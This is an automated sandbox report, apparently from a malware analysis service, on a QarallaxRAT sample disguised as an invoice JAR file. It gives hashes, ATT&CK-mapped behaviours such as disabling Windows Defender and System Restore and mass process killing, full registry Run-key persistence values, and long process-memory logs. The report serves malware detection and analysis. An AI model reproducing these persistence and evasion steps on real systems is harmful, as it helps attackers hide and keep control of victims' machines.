qarallax | bd0689a49b290187170ebe5ad6d582d18b7d13681b28e951f04172d79265d0fa

Analysis

max time kernel
148s
max time network
156s
platform
windows7_x64
resource
win7
submitted
23/09/2020, 10:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Invoice_.jar
Size

403KB
MD5

cf937e091a57e2a92baf1b8e635a0595
SHA1

1eab495dce63c73a138ed476f7309ef0e6bc1361
SHA256

bd0689a49b290187170ebe5ad6d582d18b7d13681b28e951f04172d79265d0fa
SHA512

bdc6f86f2bdc56ddf969ac8c7690bc305c034aaa3aaf6bde82400dea5ac5d47f54179a0d7ef5fbe1399b4aefe125b5ffd99f26bc966c313aad944918c9056892

Score

10^/10

persistence evasion trojan qarallax

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
QarallaxRAT
Qarallax is a RAT developed by Quaverse and sold as RaaS (RAT as a Service).
trojan qarallax

Qarallax RAT support DLL 1 IoCs

resource	yara_rule
behavioral1/files/0x000300000001354e-7.dat	qarallax_dll

Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490
Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Loads dropped DLL 1 IoCs

pid	Process
1424	java.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run\EXppBZk = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\bTTIR\\SOAqQ.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\EXppBZk = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\bTTIR\\SOAqQ.class\""	java.exe

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\bTTIR\Desktop.ini	java.exe
File created	C:\Users\Admin\bTTIR\Desktop.ini	java.exe
File opened for modification	C:\Users\Admin\bTTIR\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\bTTIR\Desktop.ini	attrib.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\sGRTV	java.exe
File opened for modification	C:\Windows\System32\sGRTV	java.exe

Kills process with taskkill 19 IoCs

evasion

pid	Process
608	taskkill.exe
2212	taskkill.exe
3024	taskkill.exe
1140	taskkill.exe
2984	taskkill.exe
2484	taskkill.exe
1932	taskkill.exe
2988	taskkill.exe
2416	taskkill.exe
2244	taskkill.exe
856	taskkill.exe
2540	taskkill.exe
1012	taskkill.exe
2372	taskkill.exe
2624	taskkill.exe
2424	taskkill.exe
2836	taskkill.exe
2348	taskkill.exe
2136	taskkill.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1412	powershell.exe
1412	powershell.exe

Suspicious use of AdjustPrivilegeToken 100 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2040	WMIC.exe
Token: SeSecurityPrivilege	2040	WMIC.exe
Token: SeTakeOwnershipPrivilege	2040	WMIC.exe
Token: SeLoadDriverPrivilege	2040	WMIC.exe
Token: SeSystemProfilePrivilege	2040	WMIC.exe
Token: SeSystemtimePrivilege	2040	WMIC.exe
Token: SeProfSingleProcessPrivilege	2040	WMIC.exe
Token: SeIncBasePriorityPrivilege	2040	WMIC.exe
Token: SeCreatePagefilePrivilege	2040	WMIC.exe
Token: SeBackupPrivilege	2040	WMIC.exe
Token: SeRestorePrivilege	2040	WMIC.exe
Token: SeShutdownPrivilege	2040	WMIC.exe
Token: SeDebugPrivilege	2040	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2040	WMIC.exe
Token: SeRemoteShutdownPrivilege	2040	WMIC.exe
Token: SeUndockPrivilege	2040	WMIC.exe
Token: SeManageVolumePrivilege	2040	WMIC.exe
Token: 33	2040	WMIC.exe
Token: 34	2040	WMIC.exe
Token: 35	2040	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2040	WMIC.exe
Token: SeSecurityPrivilege	2040	WMIC.exe
Token: SeTakeOwnershipPrivilege	2040	WMIC.exe
Token: SeLoadDriverPrivilege	2040	WMIC.exe
Token: SeSystemProfilePrivilege	2040	WMIC.exe
Token: SeSystemtimePrivilege	2040	WMIC.exe
Token: SeProfSingleProcessPrivilege	2040	WMIC.exe
Token: SeIncBasePriorityPrivilege	2040	WMIC.exe
Token: SeCreatePagefilePrivilege	2040	WMIC.exe
Token: SeBackupPrivilege	2040	WMIC.exe
Token: SeRestorePrivilege	2040	WMIC.exe
Token: SeShutdownPrivilege	2040	WMIC.exe
Token: SeDebugPrivilege	2040	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2040	WMIC.exe
Token: SeRemoteShutdownPrivilege	2040	WMIC.exe
Token: SeUndockPrivilege	2040	WMIC.exe
Token: SeManageVolumePrivilege	2040	WMIC.exe
Token: 33	2040	WMIC.exe
Token: 34	2040	WMIC.exe
Token: 35	2040	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1896	WMIC.exe
Token: SeSecurityPrivilege	1896	WMIC.exe
Token: SeTakeOwnershipPrivilege	1896	WMIC.exe
Token: SeLoadDriverPrivilege	1896	WMIC.exe
Token: SeSystemProfilePrivilege	1896	WMIC.exe
Token: SeSystemtimePrivilege	1896	WMIC.exe
Token: SeProfSingleProcessPrivilege	1896	WMIC.exe
Token: SeIncBasePriorityPrivilege	1896	WMIC.exe
Token: SeCreatePagefilePrivilege	1896	WMIC.exe
Token: SeBackupPrivilege	1896	WMIC.exe
Token: SeRestorePrivilege	1896	WMIC.exe
Token: SeShutdownPrivilege	1896	WMIC.exe
Token: SeDebugPrivilege	1896	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1896	WMIC.exe
Token: SeRemoteShutdownPrivilege	1896	WMIC.exe
Token: SeUndockPrivilege	1896	WMIC.exe
Token: SeManageVolumePrivilege	1896	WMIC.exe
Token: 33	1896	WMIC.exe
Token: 34	1896	WMIC.exe
Token: 35	1896	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1896	WMIC.exe
Token: SeSecurityPrivilege	1896	WMIC.exe
Token: SeTakeOwnershipPrivilege	1896	WMIC.exe
Token: SeLoadDriverPrivilege	1896	WMIC.exe
Token: SeSystemProfilePrivilege	1896	WMIC.exe
Token: SeSystemtimePrivilege	1896	WMIC.exe
Token: SeProfSingleProcessPrivilege	1896	WMIC.exe
Token: SeIncBasePriorityPrivilege	1896	WMIC.exe
Token: SeCreatePagefilePrivilege	1896	WMIC.exe
Token: SeBackupPrivilege	1896	WMIC.exe
Token: SeRestorePrivilege	1896	WMIC.exe
Token: SeShutdownPrivilege	1896	WMIC.exe
Token: SeDebugPrivilege	1896	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1896	WMIC.exe
Token: SeRemoteShutdownPrivilege	1896	WMIC.exe
Token: SeUndockPrivilege	1896	WMIC.exe
Token: SeManageVolumePrivilege	1896	WMIC.exe
Token: 33	1896	WMIC.exe
Token: 34	1896	WMIC.exe
Token: 35	1896	WMIC.exe
Token: SeDebugPrivilege	1140	taskkill.exe
Token: SeDebugPrivilege	608	taskkill.exe
Token: SeDebugPrivilege	2372	taskkill.exe
Token: SeDebugPrivilege	2624	taskkill.exe
Token: SeDebugPrivilege	1412	powershell.exe
Token: SeDebugPrivilege	2984	taskkill.exe
Token: SeDebugPrivilege	2244	taskkill.exe
Token: SeDebugPrivilege	2424	taskkill.exe
Token: SeDebugPrivilege	2484	taskkill.exe
Token: SeDebugPrivilege	2212	taskkill.exe
Token: SeDebugPrivilege	856	taskkill.exe
Token: SeDebugPrivilege	2836	taskkill.exe
Token: SeDebugPrivilege	2348	taskkill.exe
Token: SeDebugPrivilege	2540	taskkill.exe
Token: SeDebugPrivilege	1932	taskkill.exe
Token: SeDebugPrivilege	2988	taskkill.exe
Token: SeDebugPrivilege	1012	taskkill.exe
Token: SeDebugPrivilege	2416	taskkill.exe
Token: SeDebugPrivilege	2136	taskkill.exe
Token: SeDebugPrivilege	3024	taskkill.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1424	java.exe

Suspicious use of WriteProcessMemory 798 IoCs

description	pid	Process	procid_target
PID 1424 wrote to memory of 1876	1424	java.exe	29
PID 1424 wrote to memory of 1876	1424	java.exe	29
PID 1424 wrote to memory of 1876	1424	java.exe	29
PID 1424 wrote to memory of 1980	1424	java.exe	30
PID 1424 wrote to memory of 1980	1424	java.exe	30
PID 1424 wrote to memory of 1980	1424	java.exe	30
PID 1980 wrote to memory of 2040	1980	cmd.exe	31
PID 1980 wrote to memory of 2040	1980	cmd.exe	31
PID 1980 wrote to memory of 2040	1980	cmd.exe	31
PID 1424 wrote to memory of 1988	1424	java.exe	32
PID 1424 wrote to memory of 1988	1424	java.exe	32
PID 1424 wrote to memory of 1988	1424	java.exe	32
PID 1988 wrote to memory of 1896	1988	cmd.exe	33
PID 1988 wrote to memory of 1896	1988	cmd.exe	33
PID 1988 wrote to memory of 1896	1988	cmd.exe	33
PID 1424 wrote to memory of 1312	1424	java.exe	34
PID 1424 wrote to memory of 1312	1424	java.exe	34
PID 1424 wrote to memory of 1312	1424	java.exe	34
PID 1424 wrote to memory of 520	1424	java.exe	35
PID 1424 wrote to memory of 520	1424	java.exe	35
PID 1424 wrote to memory of 520	1424	java.exe	35
PID 1424 wrote to memory of 1672	1424	java.exe	36
PID 1424 wrote to memory of 1672	1424	java.exe	36
PID 1424 wrote to memory of 1672	1424	java.exe	36
PID 1424 wrote to memory of 544	1424	java.exe	37
PID 1424 wrote to memory of 544	1424	java.exe	37
PID 1424 wrote to memory of 544	1424	java.exe	37
PID 1424 wrote to memory of 1276	1424	java.exe	38
PID 1424 wrote to memory of 1276	1424	java.exe	38
PID 1424 wrote to memory of 1276	1424	java.exe	38
PID 1424 wrote to memory of 764	1424	java.exe	39
PID 1424 wrote to memory of 764	1424	java.exe	39
PID 1424 wrote to memory of 764	1424	java.exe	39
PID 1424 wrote to memory of 724	1424	java.exe	40
PID 1424 wrote to memory of 724	1424	java.exe	40
PID 1424 wrote to memory of 724	1424	java.exe	40
PID 1424 wrote to memory of 1496	1424	java.exe	41
PID 1424 wrote to memory of 1496	1424	java.exe	41
PID 1424 wrote to memory of 1496	1424	java.exe	41
PID 1424 wrote to memory of 1412	1424	java.exe	42
PID 1424 wrote to memory of 1412	1424	java.exe	42
PID 1424 wrote to memory of 1412	1424	java.exe	42
PID 1424 wrote to memory of 916	1424	java.exe	44
PID 1424 wrote to memory of 916	1424	java.exe	44
PID 1424 wrote to memory of 916	1424	java.exe	44
PID 1424 wrote to memory of 1608	1424	java.exe	45
PID 1424 wrote to memory of 1608	1424	java.exe	45
PID 1424 wrote to memory of 1608	1424	java.exe	45
PID 1424 wrote to memory of 884	1424	java.exe	46
PID 1424 wrote to memory of 884	1424	java.exe	46
PID 1424 wrote to memory of 884	1424	java.exe	46
PID 1424 wrote to memory of 608	1424	java.exe	47
PID 1424 wrote to memory of 608	1424	java.exe	47
PID 1424 wrote to memory of 608	1424	java.exe	47
PID 1424 wrote to memory of 1124	1424	java.exe	48
PID 1424 wrote to memory of 1124	1424	java.exe	48
PID 1424 wrote to memory of 1124	1424	java.exe	48
PID 1424 wrote to memory of 1800	1424	java.exe	49
PID 1424 wrote to memory of 1800	1424	java.exe	49
PID 1424 wrote to memory of 1800	1424	java.exe	49
PID 1424 wrote to memory of 1764	1424	java.exe	51
PID 1424 wrote to memory of 1764	1424	java.exe	51
PID 1424 wrote to memory of 1764	1424	java.exe	51
PID 1424 wrote to memory of 2000	1424	java.exe	52
PID 1424 wrote to memory of 2000	1424	java.exe	52
PID 1424 wrote to memory of 2000	1424	java.exe	52
PID 1424 wrote to memory of 2004	1424	java.exe	54
PID 1424 wrote to memory of 2004	1424	java.exe	54
PID 1424 wrote to memory of 2004	1424	java.exe	54
PID 1424 wrote to memory of 2040	1424	java.exe	55
PID 1424 wrote to memory of 2040	1424	java.exe	55
PID 1424 wrote to memory of 2040	1424	java.exe	55
PID 1424 wrote to memory of 1052	1424	java.exe	58
PID 1424 wrote to memory of 1052	1424	java.exe	58
PID 1424 wrote to memory of 1052	1424	java.exe	58
PID 1424 wrote to memory of 272	1424	java.exe	60
PID 1424 wrote to memory of 272	1424	java.exe	60
PID 1424 wrote to memory of 272	1424	java.exe	60
PID 1424 wrote to memory of 392	1424	java.exe	61
PID 1424 wrote to memory of 392	1424	java.exe	61
PID 1424 wrote to memory of 392	1424	java.exe	61
PID 1424 wrote to memory of 588	1424	java.exe	64
PID 1424 wrote to memory of 588	1424	java.exe	64
PID 1424 wrote to memory of 588	1424	java.exe	64
PID 1424 wrote to memory of 512	1424	java.exe	65
PID 1424 wrote to memory of 512	1424	java.exe	65
PID 1424 wrote to memory of 512	1424	java.exe	65
PID 1424 wrote to memory of 800	1424	java.exe	68
PID 1424 wrote to memory of 800	1424	java.exe	68
PID 1424 wrote to memory of 800	1424	java.exe	68
PID 1424 wrote to memory of 324	1424	java.exe	70
PID 1424 wrote to memory of 324	1424	java.exe	70
PID 1424 wrote to memory of 324	1424	java.exe	70
PID 1424 wrote to memory of 2008	1424	java.exe	71
PID 1424 wrote to memory of 2008	1424	java.exe	71
PID 1424 wrote to memory of 2008	1424	java.exe	71
PID 1424 wrote to memory of 1892	1424	java.exe	74
PID 1424 wrote to memory of 1892	1424	java.exe	74
PID 1424 wrote to memory of 1892	1424	java.exe	74
PID 916 wrote to memory of 1468	916	cmd.exe	77
PID 916 wrote to memory of 1468	916	cmd.exe	77
PID 916 wrote to memory of 1468	916	cmd.exe	77
PID 1424 wrote to memory of 1544	1424	java.exe	78
PID 1424 wrote to memory of 1544	1424	java.exe	78
PID 1424 wrote to memory of 1544	1424	java.exe	78
PID 1424 wrote to memory of 1140	1424	java.exe	80
PID 1424 wrote to memory of 1140	1424	java.exe	80
PID 1424 wrote to memory of 1140	1424	java.exe	80
PID 1424 wrote to memory of 1496	1424	java.exe	81
PID 1424 wrote to memory of 1496	1424	java.exe	81
PID 1424 wrote to memory of 1496	1424	java.exe	81
PID 1424 wrote to memory of 2036	1424	java.exe	83
PID 1424 wrote to memory of 2036	1424	java.exe	83
PID 1424 wrote to memory of 2036	1424	java.exe	83
PID 1424 wrote to memory of 2064	1424	java.exe	86
PID 1424 wrote to memory of 2064	1424	java.exe	86
PID 1424 wrote to memory of 2064	1424	java.exe	86
PID 1424 wrote to memory of 2100	1424	java.exe	89
PID 1424 wrote to memory of 2100	1424	java.exe	89
PID 1424 wrote to memory of 2100	1424	java.exe	89
PID 1424 wrote to memory of 2108	1424	java.exe	90
PID 1424 wrote to memory of 2108	1424	java.exe	90
PID 1424 wrote to memory of 2108	1424	java.exe	90
PID 1424 wrote to memory of 2132	1424	java.exe	91
PID 1424 wrote to memory of 2132	1424	java.exe	91
PID 1424 wrote to memory of 2132	1424	java.exe	91
PID 1424 wrote to memory of 2156	1424	java.exe	93
PID 1424 wrote to memory of 2156	1424	java.exe	93
PID 1424 wrote to memory of 2156	1424	java.exe	93
PID 1424 wrote to memory of 2188	1424	java.exe	96
PID 1424 wrote to memory of 2188	1424	java.exe	96
PID 1424 wrote to memory of 2188	1424	java.exe	96
PID 1424 wrote to memory of 2204	1424	java.exe	97
PID 1424 wrote to memory of 2204	1424	java.exe	97
PID 1424 wrote to memory of 2204	1424	java.exe	97
PID 1424 wrote to memory of 2228	1424	java.exe	99
PID 1424 wrote to memory of 2228	1424	java.exe	99
PID 1424 wrote to memory of 2228	1424	java.exe	99
PID 1424 wrote to memory of 2248	1424	java.exe	101
PID 1424 wrote to memory of 2248	1424	java.exe	101
PID 1424 wrote to memory of 2248	1424	java.exe	101
PID 1424 wrote to memory of 2280	1424	java.exe	104
PID 1424 wrote to memory of 2280	1424	java.exe	104
PID 1424 wrote to memory of 2280	1424	java.exe	104
PID 1424 wrote to memory of 2304	1424	java.exe	106
PID 1424 wrote to memory of 2304	1424	java.exe	106
PID 1424 wrote to memory of 2304	1424	java.exe	106
PID 1424 wrote to memory of 2328	1424	java.exe	108
PID 1424 wrote to memory of 2328	1424	java.exe	108
PID 1424 wrote to memory of 2328	1424	java.exe	108
PID 916 wrote to memory of 2356	916	cmd.exe	110
PID 916 wrote to memory of 2356	916	cmd.exe	110
PID 916 wrote to memory of 2356	916	cmd.exe	110
PID 1424 wrote to memory of 2372	1424	java.exe	111
PID 1424 wrote to memory of 2372	1424	java.exe	111
PID 1424 wrote to memory of 2372	1424	java.exe	111
PID 1424 wrote to memory of 2512	1424	java.exe	113
PID 1424 wrote to memory of 2512	1424	java.exe	113
PID 1424 wrote to memory of 2512	1424	java.exe	113
PID 2512 wrote to memory of 2544	2512	cmd.exe	114
PID 2512 wrote to memory of 2544	2512	cmd.exe	114
PID 2512 wrote to memory of 2544	2512	cmd.exe	114
PID 1424 wrote to memory of 2624	1424	java.exe	117
PID 1424 wrote to memory of 2624	1424	java.exe	117
PID 1424 wrote to memory of 2624	1424	java.exe	117
PID 2512 wrote to memory of 2636	2512	cmd.exe	118
PID 2512 wrote to memory of 2636	2512	cmd.exe	118
PID 2512 wrote to memory of 2636	2512	cmd.exe	118
PID 1424 wrote to memory of 2736	1424	java.exe	122
PID 1424 wrote to memory of 2736	1424	java.exe	122
PID 1424 wrote to memory of 2736	1424	java.exe	122
PID 2736 wrote to memory of 2768	2736	cmd.exe	124
PID 2736 wrote to memory of 2768	2736	cmd.exe	124
PID 2736 wrote to memory of 2768	2736	cmd.exe	124
PID 2736 wrote to memory of 2788	2736	cmd.exe	125
PID 2736 wrote to memory of 2788	2736	cmd.exe	125
PID 2736 wrote to memory of 2788	2736	cmd.exe	125
PID 1424 wrote to memory of 2804	1424	java.exe	126
PID 1424 wrote to memory of 2804	1424	java.exe	126
PID 1424 wrote to memory of 2804	1424	java.exe	126
PID 2804 wrote to memory of 2816	2804	cmd.exe	127
PID 2804 wrote to memory of 2816	2804	cmd.exe	127
PID 2804 wrote to memory of 2816	2804	cmd.exe	127
PID 2804 wrote to memory of 2856	2804	cmd.exe	128
PID 2804 wrote to memory of 2856	2804	cmd.exe	128
PID 2804 wrote to memory of 2856	2804	cmd.exe	128
PID 1424 wrote to memory of 2868	1424	java.exe	129
PID 1424 wrote to memory of 2868	1424	java.exe	129
PID 1424 wrote to memory of 2868	1424	java.exe	129
PID 2868 wrote to memory of 2880	2868	cmd.exe	130
PID 2868 wrote to memory of 2880	2868	cmd.exe	130
PID 2868 wrote to memory of 2880	2868	cmd.exe	130
PID 2868 wrote to memory of 2896	2868	cmd.exe	131
PID 2868 wrote to memory of 2896	2868	cmd.exe	131
PID 2868 wrote to memory of 2896	2868	cmd.exe	131
PID 1424 wrote to memory of 2916	1424	java.exe	132
PID 1424 wrote to memory of 2916	1424	java.exe	132
PID 1424 wrote to memory of 2916	1424	java.exe	132
PID 2916 wrote to memory of 2928	2916	cmd.exe	133
PID 2916 wrote to memory of 2928	2916	cmd.exe	133
PID 2916 wrote to memory of 2928	2916	cmd.exe	133
PID 2916 wrote to memory of 2948	2916	cmd.exe	134
PID 2916 wrote to memory of 2948	2916	cmd.exe	134
PID 2916 wrote to memory of 2948	2916	cmd.exe	134
PID 1424 wrote to memory of 2960	1424	java.exe	135
PID 1424 wrote to memory of 2960	1424	java.exe	135
PID 1424 wrote to memory of 2960	1424	java.exe	135
PID 2960 wrote to memory of 2972	2960	cmd.exe	136
PID 2960 wrote to memory of 2972	2960	cmd.exe	136
PID 2960 wrote to memory of 2972	2960	cmd.exe	136
PID 1424 wrote to memory of 2984	1424	java.exe	137
PID 1424 wrote to memory of 2984	1424	java.exe	137
PID 1424 wrote to memory of 2984	1424	java.exe	137
PID 2960 wrote to memory of 3004	2960	cmd.exe	139
PID 2960 wrote to memory of 3004	2960	cmd.exe	139
PID 2960 wrote to memory of 3004	2960	cmd.exe	139
PID 1424 wrote to memory of 3024	1424	java.exe	140
PID 1424 wrote to memory of 3024	1424	java.exe	140
PID 1424 wrote to memory of 3024	1424	java.exe	140
PID 3024 wrote to memory of 3040	3024	cmd.exe	141
PID 3024 wrote to memory of 3040	3024	cmd.exe	141
PID 3024 wrote to memory of 3040	3024	cmd.exe	141
PID 3024 wrote to memory of 1252	3024	cmd.exe	142
PID 3024 wrote to memory of 1252	3024	cmd.exe	142
PID 3024 wrote to memory of 1252	3024	cmd.exe	142
PID 1424 wrote to memory of 1112	1424	java.exe	143
PID 1424 wrote to memory of 1112	1424	java.exe	143
PID 1424 wrote to memory of 1112	1424	java.exe	143
PID 1112 wrote to memory of 2076	1112	cmd.exe	144
PID 1112 wrote to memory of 2076	1112	cmd.exe	144
PID 1112 wrote to memory of 2076	1112	cmd.exe	144
PID 1112 wrote to memory of 2128	1112	cmd.exe	145
PID 1112 wrote to memory of 2128	1112	cmd.exe	145
PID 1112 wrote to memory of 2128	1112	cmd.exe	145
PID 1424 wrote to memory of 2184	1424	java.exe	146
PID 1424 wrote to memory of 2184	1424	java.exe	146
PID 1424 wrote to memory of 2184	1424	java.exe	146
PID 2184 wrote to memory of 2200	2184	cmd.exe	147
PID 2184 wrote to memory of 2200	2184	cmd.exe	147
PID 2184 wrote to memory of 2200	2184	cmd.exe	147
PID 2184 wrote to memory of 2216	2184	cmd.exe	148
PID 2184 wrote to memory of 2216	2184	cmd.exe	148
PID 2184 wrote to memory of 2216	2184	cmd.exe	148
PID 1424 wrote to memory of 2256	1424	java.exe	149
PID 1424 wrote to memory of 2256	1424	java.exe	149
PID 1424 wrote to memory of 2256	1424	java.exe	149
PID 2256 wrote to memory of 2292	2256	cmd.exe	150
PID 2256 wrote to memory of 2292	2256	cmd.exe	150
PID 2256 wrote to memory of 2292	2256	cmd.exe	150
PID 2256 wrote to memory of 2316	2256	cmd.exe	151
PID 2256 wrote to memory of 2316	2256	cmd.exe	151
PID 2256 wrote to memory of 2316	2256	cmd.exe	151
PID 1424 wrote to memory of 1860	1424	java.exe	152
PID 1424 wrote to memory of 1860	1424	java.exe	152
PID 1424 wrote to memory of 1860	1424	java.exe	152
PID 1860 wrote to memory of 832	1860	cmd.exe	153
PID 1860 wrote to memory of 832	1860	cmd.exe	153
PID 1860 wrote to memory of 832	1860	cmd.exe	153
PID 1860 wrote to memory of 1932	1860	cmd.exe	154
PID 1860 wrote to memory of 1932	1860	cmd.exe	154
PID 1860 wrote to memory of 1932	1860	cmd.exe	154
PID 1424 wrote to memory of 544	1424	java.exe	155
PID 1424 wrote to memory of 544	1424	java.exe	155
PID 1424 wrote to memory of 544	1424	java.exe	155
PID 1424 wrote to memory of 2244	1424	java.exe	156
PID 1424 wrote to memory of 2244	1424	java.exe	156
PID 1424 wrote to memory of 2244	1424	java.exe	156
PID 544 wrote to memory of 1824	544	cmd.exe	157
PID 544 wrote to memory of 1824	544	cmd.exe	157
PID 544 wrote to memory of 1824	544	cmd.exe	157
PID 544 wrote to memory of 1016	544	cmd.exe	158
PID 544 wrote to memory of 1016	544	cmd.exe	158
PID 544 wrote to memory of 1016	544	cmd.exe	158
PID 1424 wrote to memory of 672	1424	java.exe	160
PID 1424 wrote to memory of 672	1424	java.exe	160
PID 1424 wrote to memory of 672	1424	java.exe	160
PID 672 wrote to memory of 1504	672	cmd.exe	161
PID 672 wrote to memory of 1504	672	cmd.exe	161
PID 672 wrote to memory of 1504	672	cmd.exe	161
PID 672 wrote to memory of 588	672	cmd.exe	162
PID 672 wrote to memory of 588	672	cmd.exe	162
PID 672 wrote to memory of 588	672	cmd.exe	162
PID 1424 wrote to memory of 1052	1424	java.exe	163
PID 1424 wrote to memory of 1052	1424	java.exe	163
PID 1424 wrote to memory of 1052	1424	java.exe	163
PID 1052 wrote to memory of 2084	1052	cmd.exe	164
PID 1052 wrote to memory of 2084	1052	cmd.exe	164
PID 1052 wrote to memory of 2084	1052	cmd.exe	164
PID 1052 wrote to memory of 2008	1052	cmd.exe	165
PID 1052 wrote to memory of 2008	1052	cmd.exe	165
PID 1052 wrote to memory of 2008	1052	cmd.exe	165
PID 1424 wrote to memory of 856	1424	java.exe	166
PID 1424 wrote to memory of 856	1424	java.exe	166
PID 1424 wrote to memory of 856	1424	java.exe	166
PID 856 wrote to memory of 1964	856	cmd.exe	167
PID 856 wrote to memory of 1964	856	cmd.exe	167
PID 856 wrote to memory of 1964	856	cmd.exe	167
PID 856 wrote to memory of 2180	856	cmd.exe	168
PID 856 wrote to memory of 2180	856	cmd.exe	168
PID 856 wrote to memory of 2180	856	cmd.exe	168
PID 1424 wrote to memory of 2188	1424	java.exe	169
PID 1424 wrote to memory of 2188	1424	java.exe	169
PID 1424 wrote to memory of 2188	1424	java.exe	169
PID 2188 wrote to memory of 2204	2188	cmd.exe	170
PID 2188 wrote to memory of 2204	2188	cmd.exe	170
PID 2188 wrote to memory of 2204	2188	cmd.exe	170
PID 2188 wrote to memory of 2220	2188	cmd.exe	171
PID 2188 wrote to memory of 2220	2188	cmd.exe	171
PID 2188 wrote to memory of 2220	2188	cmd.exe	171
PID 1424 wrote to memory of 2276	1424	java.exe	172
PID 1424 wrote to memory of 2276	1424	java.exe	172
PID 1424 wrote to memory of 2276	1424	java.exe	172
PID 2276 wrote to memory of 1892	2276	cmd.exe	173
PID 2276 wrote to memory of 1892	2276	cmd.exe	173
PID 2276 wrote to memory of 1892	2276	cmd.exe	173
PID 2276 wrote to memory of 2396	2276	cmd.exe	174
PID 2276 wrote to memory of 2396	2276	cmd.exe	174
PID 2276 wrote to memory of 2396	2276	cmd.exe	174
PID 1424 wrote to memory of 2392	1424	java.exe	175
PID 1424 wrote to memory of 2392	1424	java.exe	175
PID 1424 wrote to memory of 2392	1424	java.exe	175
PID 1424 wrote to memory of 2424	1424	java.exe	176
PID 1424 wrote to memory of 2424	1424	java.exe	176
PID 1424 wrote to memory of 2424	1424	java.exe	176
PID 2392 wrote to memory of 2108	2392	cmd.exe	177
PID 2392 wrote to memory of 2108	2392	cmd.exe	177
PID 2392 wrote to memory of 2108	2392	cmd.exe	177
PID 2392 wrote to memory of 2468	2392	cmd.exe	179
PID 2392 wrote to memory of 2468	2392	cmd.exe	179
PID 2392 wrote to memory of 2468	2392	cmd.exe	179
PID 1424 wrote to memory of 2456	1424	java.exe	180
PID 1424 wrote to memory of 2456	1424	java.exe	180
PID 1424 wrote to memory of 2456	1424	java.exe	180
PID 2456 wrote to memory of 2448	2456	cmd.exe	181
PID 2456 wrote to memory of 2448	2456	cmd.exe	181
PID 2456 wrote to memory of 2448	2456	cmd.exe	181
PID 2456 wrote to memory of 2168	2456	cmd.exe	182
PID 2456 wrote to memory of 2168	2456	cmd.exe	182
PID 2456 wrote to memory of 2168	2456	cmd.exe	182
PID 1424 wrote to memory of 1876	1424	java.exe	183
PID 1424 wrote to memory of 1876	1424	java.exe	183
PID 1424 wrote to memory of 1876	1424	java.exe	183
PID 1876 wrote to memory of 2464	1876	cmd.exe	184
PID 1876 wrote to memory of 2464	1876	cmd.exe	184
PID 1876 wrote to memory of 2464	1876	cmd.exe	184
PID 1876 wrote to memory of 1544	1876	cmd.exe	185
PID 1876 wrote to memory of 1544	1876	cmd.exe	185
PID 1876 wrote to memory of 1544	1876	cmd.exe	185
PID 1424 wrote to memory of 2228	1424	java.exe	186
PID 1424 wrote to memory of 2228	1424	java.exe	186
PID 1424 wrote to memory of 2228	1424	java.exe	186
PID 2228 wrote to memory of 2472	2228	cmd.exe	187
PID 2228 wrote to memory of 2472	2228	cmd.exe	187
PID 2228 wrote to memory of 2472	2228	cmd.exe	187
PID 2228 wrote to memory of 2332	2228	cmd.exe	188
PID 2228 wrote to memory of 2332	2228	cmd.exe	188
PID 2228 wrote to memory of 2332	2228	cmd.exe	188
PID 1424 wrote to memory of 2248	1424	java.exe	189
PID 1424 wrote to memory of 2248	1424	java.exe	189
PID 1424 wrote to memory of 2248	1424	java.exe	189
PID 1424 wrote to memory of 2484	1424	java.exe	191
PID 1424 wrote to memory of 2484	1424	java.exe	191
PID 1424 wrote to memory of 2484	1424	java.exe	191
PID 2248 wrote to memory of 2272	2248	cmd.exe	190
PID 2248 wrote to memory of 2272	2248	cmd.exe	190
PID 2248 wrote to memory of 2272	2248	cmd.exe	190
PID 2248 wrote to memory of 2632	2248	cmd.exe	193
PID 2248 wrote to memory of 2632	2248	cmd.exe	193
PID 2248 wrote to memory of 2632	2248	cmd.exe	193
PID 1424 wrote to memory of 1512	1424	java.exe	194
PID 1424 wrote to memory of 1512	1424	java.exe	194
PID 1424 wrote to memory of 1512	1424	java.exe	194
PID 1512 wrote to memory of 2676	1512	cmd.exe	195
PID 1512 wrote to memory of 2676	1512	cmd.exe	195
PID 1512 wrote to memory of 2676	1512	cmd.exe	195
PID 1512 wrote to memory of 884	1512	cmd.exe	196
PID 1512 wrote to memory of 884	1512	cmd.exe	196
PID 1512 wrote to memory of 884	1512	cmd.exe	196
PID 1424 wrote to memory of 2728	1424	java.exe	197
PID 1424 wrote to memory of 2728	1424	java.exe	197
PID 1424 wrote to memory of 2728	1424	java.exe	197
PID 2728 wrote to memory of 2636	2728	cmd.exe	198
PID 2728 wrote to memory of 2636	2728	cmd.exe	198
